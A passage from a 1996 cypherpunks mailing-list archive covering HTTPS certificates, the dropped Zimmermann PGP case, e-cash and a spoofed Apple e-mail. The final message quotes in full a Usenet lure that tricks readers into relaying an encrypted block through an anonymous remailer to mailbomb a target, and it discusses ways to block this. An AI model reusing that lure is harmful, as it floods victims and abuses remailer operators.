and https and SSLeay, apache, and generating renegade (ie, your own)
certificates. If someone wants to go over this [again] certainly it'd be
welcome.

I was today playing around with a Mozilla 2.0beta5 that someone gave me
[more bells and whistles than my 1.12, but not much more bang for the buck]
and was showing a friend all the nifty information that netscape tells
about you when you visit sites, then went to c2 to show off the apache
web server and when I tried to use https:// to show off how you can have your
own encrypting web server for free and everything, a window popped up and
said the certificate was expired.

I couldn't really tell if it meant that the certificate that Sameer generated
really needed to be updated, or if Netscape beta 5 had just been rigged to
reject non-netscape certificates, but the end result was no encryption.

(Jeff, if you're reading this, of course we know that Netscape, with it's open
loving policies wouldn't do anything underhanded, but the thought does come
to mind, and by the way, when are we going to see an option to turn off or
control what information is passed out to the other end. Specifically, I'd like
http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl to come up nearly blank.)

Soooo, anyway, I was wondering if anyone knows anything about the use of
privately generated certificates. Yes, Jeff, we know that Netscape is jumping
to fully support user-specified certificates, but personally I saw, relating
to certificates, a lot of *nifty* options and displays, but really didn't
see much in the way of anything that looked like "add".

...Looking forward to the day where end-to-end encryption is king, and the
TLA, my competition, or anyone else can take their packet sniffer and kiss
my butt.

Don
 
PS: my predictions on the PRZ-secretly-sold-out-rumor-index: 6.
    my predictions on the IQ of those making those claims:   6. (cumulative)
    woohooo Phil!
- -- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMPXDV8La+QKZS485AQHkXwMAnGWVeLB6ntpkK1ksZ7a8+iklA/sPfIT2
XqqJRRX0Ddg2UuAAxmk6WOC/nxnRPRlM/4AkkaEohZRv14ccnlvv3qVGFxpLlxKG
iYgbn1x9/xgHjwAB31HqozQix79wPfB/
=v9ni
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 12 Jan 1996 18:54:03 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601121039.FAA03748@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[My sincere congrats to PRZ & Mr. Goen, and to Mr. Keane for getting
a clue. I am sure the timing of this happy news had *nothing at all*
to do with politics...<g>]

A few questions about the investigation:

What did the ZLDF end up spending?

What did the govt. end up spending?
[I know, it's hard to track taxe$.]

Was this decision on the part of the prosecution as voluntary as it's
made to sound, or were some members of the grand jury starting to make
"nullification noises" as the investigation progressed? Has the grand
jury been dismissed yet? If so, have any jurors spoken publicly about
the investigation?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMPY6HW1lp8bpvW01AQH6oAQAjCePRH2YcEo/OlJrfXMG/K0Fk0/0gcE5
z9k0AYDeNb4iY7vaxSaauPlbQZrw2J48ItWf1y45LSiAE32+sJvYogrIyJbqTDhB
4yC5uXXPzLQcA3tp3AEkUe7Zbr7n1X1uAz2LwfddwRRiNnXxFtd0TIcReg4Bdv5g
KB8S+9fCgk8=
=hPyf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 12 Jan 1996 19:22:44 +0800
Subject: No Subject
Message-ID: <QQzyen15147.199601121118@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jan 1996 hallam@w3.org wrote:
> make small ones out of big ones. Thats a big plus in many peoples books.
> 

> 
> 
> >	We've made no progress. Phil has lots lots of time and gained
> >lots of grey hairs, and everyone who donated to his defense fund lost
> >money.
> 
> No progress? At least Phil is not going off on a trip to Alcatraz to
> One of the most overdue reforms of the US government is the renaming of
> the FBI building to remove the name of J Edgar Hoover. The abuse of power 
> under his administration of the FBI continues to poison the US polity
> by providing clear proof to many citizens that their government cannot be 
> trusted. While the abuses of Hoover continue to be commemerated in this
> fashion there can be little public confidence in any claims of reform.
> 
> >	The US can still harass people if they want, and make their
> >life hell.
> 
> Not just the US government. There are many crooks out there who have attempted
> or are attempting worse. At least with the government there are means to
> bring it to heel eventually.
> 
> 	Phill
> 
> 

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 12 Jan 1996 19:29:50 +0800
To: cypherpunks@toad.com
Subject: PGP_foi
Message-ID: <199601121122.GAA22917@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-12-96. NYPaper:

   "Data Secrecy Export Case Dropped by U.S." By John Markoff.

   PGP_foi







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 12 Jan 1996 19:29:48 +0800
Subject: No Subject
Message-ID: <QQzyen15525.199601121123@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> >	We've made no progress. Phil has lots lots of time and gained
> >lots of grey hairs, and everyone who donated to his defense fund lost
> >money.
> 
> No progress? At least Phil is not going off on a trip to Alcatraz to
> make small ones out of big ones. Thats a big plus in many peoples books.

I wish I could make another of my pollyannaish posts now, but I agree with
Sameer.  It's great that Phil's off the hook, but there's nothing to stop
them from doing the same thing to someone else tomorrow.  What's more,,
everyone here knows that, and so the government gets what it really wants: 
a chilling effect on crypto development. 

How much credit do you give a guy when he stops beating his wife?  They
put Phil through the ringer, made him spend his money on lawyers, and
added a lot of stress to his life.  But they haven't admitted that they
were wrong, and they haven't renounced such actions in the future.

We're all very happy that Phil's out of the woods, and today's
announcement is a great thing.  

But it's not enough. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roger@coelacanth.com (Roger Williams)
Date: Fri, 12 Jan 1996 18:36:03 +0800
Subject: Re: Net Metaphor
In-Reply-To: <2.2.32.19960110204432.006a9008@mail.teleport.com>
Message-ID: <rogerwx6xc32n.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Bruce" == Bruce Baugh <bruceab@teleport.com> writes:

  > I've recently begun using this metaphor: the Internet is a
  > society, composed of all the systems that "speak" its computer
  > protocols...

Hey -- I like it!  (You don't have a trademark on that, do you? ;)

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 12 Jan 1996 23:35:10 +0800
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <QQzydm15184.199601120439@relay2.UU.NET>
Message-ID: <30F67AE6.76F1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


owner-cypherpunks@toad.com wrote:

> I was today playing around with a Mozilla 2.0beta5 that someone gave me
> [more bells and whistles than my 1.12, but not much more bang for the buck]
> and was showing a friend all the nifty information that netscape tells
> about you when you visit sites, then went to c2 to show off the apache
> web server and when I tried to use https:// to show off how you can have your
> own encrypting web server for free and everything, a window popped up and
> said the certificate was expired.
>
> I couldn't really tell if it meant that the certificate that Sameer generated
> really needed to be updated, or if Netscape beta 5 had just been rigged to
> reject non-netscape certificates, but the end result was no encryption.

  I just looked at c2's certificate, and it doesn't expire until april.
The only reason I can think of that you should have a problem is if the
date on your machine is wrong.

> (Jeff, if you're reading this, of course we know that Netscape, with it's open
> loving policies wouldn't do anything underhanded, but the thought does come
> to mind, and by the way, when are we going to see an option to turn off or
> control what information is passed out to the other end. Specifically, I'd like
> http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl to come up nearly blank.)

  We do not send the HTTP 'From:' header.  I will look into where
they are getting the user name and location from.  There is really
nothing I can do in the Navigator to stop them from getting your
IP address or DNS name.

> Soooo, anyway, I was wondering if anyone knows anything about the use of
> privately generated certificates. Yes, Jeff, we know that Netscape is jumping
> to fully support user-specified certificates, but personally I saw, relating
> to certificates, a lot of *nifty* options and displays, but really didn't
> see much in the way of anything that looked like "add".

  If you are operating a server you can use a certificate signed by any
CA you want.  When someone running Navigator 2.0 connects to that site
they will be presented with a sequence of dialogs that allow them to
decide if they want to talk to your site.  

  Adding new certificates (other than for remote SSL servers) will generally
be done via CA web pages, not the preferences UI.  

	--Jeff
-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sat, 13 Jan 1996 01:37:33 +0800
To: "Patiwat Panurach (akira rising)" <pati@ipied.tu.ac.th>
Subject: Re: E-cash and Interest
In-Reply-To: <Pine.SUN.3.91.960112124749.6436B-100000@ipied>
Message-ID: <Pine.OSF.3.91.960112073508.31931B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



I guess that it would depend upon your definition of 'withdraw'. If you 
say that money is withdrawn when it is on your hard drive, what you say 
is true. However, if the money is 'withdrawn' when it is returned to the 
'bank' for 'clearing it could still earn interest. Of course, this is 
predicated on an e-cash/check analogy that requires specific clearing. In 
any case, at some point, this stuff has to be turned into 'real money'.

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================



On Fri, 12 Jan 1996, Patiwat Panurach (akira rising) wrote:

> On Wed, 10 Jan 1996, Tim Philp wrote:
> 
> > I think that you have hit the nail on the head. Money could still 'earn' 
> > interest until it is spent. The 'bank' still has the 'real' money. In 
> 
> NO!  money could still earn interest untill it is _withdrawn_.  This 
> includes withdrawals from MTB accounts into the Mint.  Coz ecash in any 
> form (whether in the mint or in the HDD) is equivalent to cash.  And cash 
> (by definition) cant earn interest.
> 
> -------------------------------------------------------------------------------
> Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
> eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
> m/18 junior Fac of Economics		-Johann W.Von Goethe
> -------------------------------------------------------------------------------
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Sat, 13 Jan 1996 01:06:20 +0800
To: cypherpunks@toad.com
Subject: Phil Z getting through customs
Message-ID: <199601121612.IAA06275@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


David Koontz wrote:
> The question is, can Phil get through U.S. Customs at a point of entry
> in a reasonable time, now?

No.  Just because he's off the hook as such doesn't mean that Customs 
will know about it. Customs officials often appear to me to be in 
their own little world...(personal opinion only.)

I wasn't aware that Phil would have problems at customs anyway.  If 
you answer the questions truthfully and are a US citizen, they really 
can't hold you back.

Brad

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 12 Jan 1996 21:07:38 +0800
To: cypherpunks@toad.com
Subject: Re: BIG NEWS: PRZ investigation dropped!
In-Reply-To: <199601120538.VAA02068@blob.best.net>
Message-ID: <199601120716.IAA11219@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald (jamesd@echeque.com) wrote:
: >From: Stanton McCandlish <mech@eff.org>
: >Date: Thu, 11 Jan 1996 11:53:46 -0800 (PST)
: >
: >Justice Dept. dropped investigation of Phil Zimmermann, declines to 
: >prosecute.
: 
: I never expected them to prosecute, unless he forced them to by
: toilet bombing the court, but I did expect them to keep on
: "investigating" him forever and a day.

The statute of limitations would have run out in a few months.

They could have kept "investigating" a little longer, but then they would
have looked really stupid investigating a crime that they couldn't
prosecute.  That would also have been clear evidence of harassment.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Sat, 13 Jan 1996 01:19:16 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601121619.IAA06808@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


> Well, so far the feds haven't prosecuted "Jim Bidzos" for posting Crypto++
> to usenet.  Anyway, both versions have been on utopia.hacktic.nl for months.
 
I thought that it was determined to be a hoax.  Someone "disguised" 
as Jim Bidzos posted it to USENET.

Anyone have confirmation?

Brad
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Sat, 13 Jan 1996 07:18:50 +0800
To: cypherpunks@toad.com
Subject: NoneRe: Zimmermann case is dropped.
In-Reply-To: <199601120023.TAA22279@homeport.org>
Message-ID: <199601120726.IAA11381@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


adam@lighthouse.homeport.org (Adam Shostack) wrote:

>        If someone really is looking to get in trouble for exporting
>crypto software, I'd suggest that they consider Crypto++ or Cryptolib
>as good things to export.

Well, so far the feds haven't prosecuted "Jim Bidzos" for posting Crypto++
to usenet.  Anyway, both versions have been on utopia.hacktic.nl for months.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 13 Jan 1996 01:28:48 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: (none)
In-Reply-To: <30F67AE6.76F1@netscape.com>
Message-ID: <199601121631.IAA03887@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > control what information is passed out to the other end. Specifically, I'd like
> > http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl to come up nearly blank.)
> 
>   We do not send the HTTP 'From:' header.  I will look into where
> they are getting the user name and location from.  There is really
> nothing I can do in the Navigator to stop them from getting your
> IP address or DNS name.

	I beleive that it uses finger. If you really want to prevent
people from finding out where you're coming from, use the
anonymizer. Not at CMU? Don't worry.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 13 Jan 1996 01:29:59 +0800
To: don@cs.byu.edu
Subject: Re: https & encrypted connections
In-Reply-To: <199601120211.TAA00265@wero.cs.byu.edu>
Message-ID: <199601121633.IAA04084@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Soooo, anyway, I was wondering if anyone knows anything about the use of
> privately generated certificates. Yes, Jeff, we know that Netscape is jumping

	We use a Verisign-signed certificate here at c2, btw.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Fri, 12 Jan 1996 21:51:52 +0800
To: sameer <sameer@c2.org>
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601112329.PAA15617@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.960112082905.4338j-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jan 1996, sameer wrote:

> 	We've made no progress. Phil has lots lots of time and gained
> lots of grey hairs, and everyone who donated to his defense fund lost
> money.
> 	The US can still harass people if they want, and make their
> life hell.

Agreed.  To me it was always a question of _when_ the charges would be
dropped, not _if_.  The point of these things is generally not to
prosecute people but to harrass them, paralyze them, and make them
blow lots of money.  Unfortunately, the government was successful on
all three counts.  The good news is that if the case hadn't been
dropped it would have meant more of all three for Phil, whether or not
he "won" the case in the end.

   --Dave.

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Fri, 12 Jan 1996 22:15:39 +0800
To: cypherpunks@toad.com
Subject: E-mail Spoof Throws Apple for a Loop
Message-ID: <199601121356.IAA03781@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Your message here.
Dirty, Rotten E-Mail Liar Accuses
 Apple of Being Worth a Lot More

 By JIM CARLTON
 Staff Reporter of The Wall Street Journal 

 To Apple Computer Inc.'s litany of woes, add a mad e-mailer. 

 The e-mailer struck this week with a copy of a bogus message
 from Sony Corp.'s president threatening a hostile takeover of the
 Cupertino, Calif., computer maker. The "letter" showed up in e-mail
 baskets of computers throughout Silicon Valley and beyond. 

 Managers at Apple read the letter with great interest -- until they
 got to the part about Sony offering $63 a share, or roughly double
 Apple's stock value. 

 Now Silicon Valley is abuzz about who the mad e-mailer is. Sony
 has launched an investigation, promising to explore "the availability
 of appropriate legal action against those responsible." 

 At first glance, the letter appears to be worded authentically
 enough. Addressed to Apple CEO Michael Spindler from
 Nobuyuki Idei, it says Sony intends to buy all of Apple's shares for
 $7.74 billion after a breakdown in merger talks that were
 supposedly taking place between the two companies. "We believe
 this is the fastest, most efficient way to bring our companies
 together," Mr. Idei purportedly says. 

 But at Apple, executives quickly dismissed the letter as a prank.
 For one thing, the Apple e-mail address was for a "c.franz," a
 person unknown to the company. The letter also misidentified Mr.
 Idei as Sony's chairman and CEO. And initial notification of such a
 takeover bid is almost never made by letter, for secrecy reasons. 

 So just who is the mad e-mailer? The return address was left
 blank, and a list of suspects could prove endless. A disgruntled
 employee is one possibility. Scads of Apple managers have
 departed in recent months. Or, analysts say, it could be a cheap
 shot by an employee at an Apple competitor. Whoever the culprit
 is, "this sounds like a real attempt to tick somebody off," says Mark
 Macgillivray, an industry consultant in Sunnyvale, Calif. 

 The e-mail letter was circulating as Apple was announcing an
 estimated loss of $68 million and plans for a restructuring that
 analysts expect to include massive layoffs. Since Apple has long
 been rumored to be a takeover target, the letter added to the angst
 in Cupertino. 

 In a reflection of morale at Apple, some engineers are joking
 they're disappointed the letter was phony. They would have liked
 Apple to accept the offer. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 13 Jan 1996 18:20:36 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601121406.JAA26445@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by nobody@REPLAY.COM (Anonymous) on Fri, 12 
Jan  2:50 PM

>   ...and I'm sure they'll be watching VERY closely to 
>see how  version 3.0 will be distributed....



   AUSA William Keane in today's WSJ:

      "This decision shouldn't be interpreted as meaning
      anything. I caution people against concluding the
      Internet is now free for export."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 13 Jan 1996 09:33:16 +0800
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601121722.LAA04179@proust.suba.com>
Message-ID: <199601121726.JAA12197@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> archive.  If an institution like MIT hosted a more generalized site where
> people could distribute code, it would go a long way towards thawing out

	ftp.csua.berkeley.edu is a pretty general archive. Too bad no
one's maintaining it. (It's not really official, though, it's run by a
student group, not the university.)

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Sat, 13 Jan 1996 08:56:06 +0800
To: cypherpunks@toad.com
Subject: AP Article on Zimmerman Case
Message-ID: <Pine.BSD/.3.91.960112100709.7091A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.boston.com/globe/ap/cgi-bin/retrieve?%2Fglobe%2Fapwir%2F011%2Fnat%2Faa040011

Excerpt for the web impaired:

     ``Zimmermann never exported Pretty Good Privacy, so the U.S. 
Attorney seemed to be missing the point. Unfortunately there still is no
     clear ruling from our government as to whether or not making 
software available on the Internet counts as exporting it,'' said Simson
     Garfinkel, who wrote a book about the program. 

     Zimmermann's supporters argued that without encryption, government 
could do widespread eavesdropping, perhaps for political
     reasons, scanning for words and phrases it considers subversive. 
They acknowledge that a few criminals may use programs like PGP
     to hide out in cyberspace, but believe that concern is outweighed by 
free speech and privacy rights. 

     ``The case was part of the government effort to crack down on good 
technologies for privacy. We hope the government's decision
     signals a rethinking of federal policy in this very important 
area,'' said Marc Rotenberg of the Electronic Privacy Information Center in
     Washington, an on-line civil rights watchdog group. 

     Others see the 2-year investigation of Zimmermann as intimidation. 

     ``It seems to me is that all the U.S. Attorney is saying is that 
they don't want the public relations nightmare of prosecuting Philip
     Zimmermann, but they still want everyone scared so that they won't 
exercise their Constitutional rights,'' Garfinkel said. 

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 13 Jan 1996 00:32:31 +0800
To: jya@pipeline.com>
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601121406.JAA26445@pipe4.nyc.pipeline.com>
Message-ID: <UkxblKu00YUqI5_61_@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 12-Jan-96 Re: Zimmermann case is
drop.. by John Young@pipeline.com 
>    AUSA William Keane in today's WSJ:
>  
>       "This decision shouldn't be interpreted as meaning
>       anything. I caution people against concluding the
>       Internet is now free for export."

And in today's Washington Post, in an article by Elizabeth Corcoran:

   William P. Keane, assistant U.S. attorney in San Jose, declined to
   explain why the government closed its investigation of Zimmermann,
   citing the Justice Department's policy of not commenting on reasons
   for dropping a case.
   
   There is "no change in law, no change in [encryption] policy," he
   said. "If you're planning on making encryption available over the
   Internet . . . or other means, better check with the State Department
   first."

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sat, 13 Jan 1996 03:33:21 +0800
To: cypherpunks@toad.com
Subject: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
Message-ID: <Q6q9w8m9LYlM085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Somebody, too clever for their own good by half, has come up with a
novel way of using Usenet and anonymous remailers to perpetrate
mailbombs.  The M.O. is to post a message to the naked-lady newsgroups
saying "get pics in your mailbox! send this message to this address!),
giving the email address of a cypherpunk-style anonymous remailer and
including a pgp-encrypted message block.

Thousands of horny net geeks will send in the message; some of them 
will even follow instructions correctly so the remailer forwards the
message to its intended target.  The result is that the target will
be mailbombed -- and the remailer operator can't stop the abuse by
blocking the abuser's address, because it's coming from all over the
net.  

There is *no* chance that this is legitimate.  The remailer discards the
original message header.  There is no way for the recipient to know who
sent the email message.

Cypherpunks:  is there any way to respond to, or prevent, this sort of
attack short of actually shutting down the remailer?  

What comes to my mind is the remailer operator grepping for a character
string of ASCII-armored cyphertext from the known attack message and
throwing messages containing it into the bit-bucket.  It is highly
unlikely that this would appear in any message except the attack
message.  The problem with this is that it works only for a known attack
message -- it can shut down an ongoing attack, but it can't prevent new
ones.

I am including the widely-crossposted attack message below, including headers.

   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

> Xref: netcom.com alt.sex:292849 alt.sex.wizards:44144 alt.sex.magazines:11634 alt.binaries.pictures.erotica:364153 alt.binaries.pictures.erotica.blondes:48686 alt.binaries.pictures.erotica.female:130066 alt.sex.movies:91249 alt.sex.pictures:98757
> Newsgroups: alt.sex,alt.sex.wizards,alt.sex.magazines,alt.binaries.pictures.erotica,alt.binaries.pictures.erotica.blondes,alt.binaries.pictures.erotica.female,alt.sex.movies,alt.sex.pictures
> Path: netcom.com!ix.netcom.com!howland.reston.ans.net!news.sprintlink.net!nuclear.microserve.net!luzskru.cpcnet.com!www-39-190
> From: luzskru@cpcnet.com (luzskru)
> Subject: Get Penthouse and Playboy pics on your mail box!!
> Message-ID: <1b7cc$12a26.20@luzskru.cpcnet.com>
> Date: Thu, 11 Jan 1996 18:10:37 GMT
> Organization: http://www.cpcnet.com/~luzskru/home.htm
> X-Newsreader: News Xpress Version 1.0 Beta #4
> Lines: 119
> 
> Follow these instructions.  
> 1) paste everything between the -------- into the body of your message. Be 
> sure to leave the first line blank and include everything including the ::
> 2) Send the message to homer@rahul.net
> 3) as the subject, specify playboy or penthouse and the month.
> 4) if you don't get the file within a few hours, then send it again and be 
> sure that you didn't do something wrong.  Here is the message:
> 
> ---------------------------------------------------------
> 
> ::
> Encrypted: pgp
> 
> -----BEGIN PGP MESSAGE-----
> Version: 2.6.2i
> 
> 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
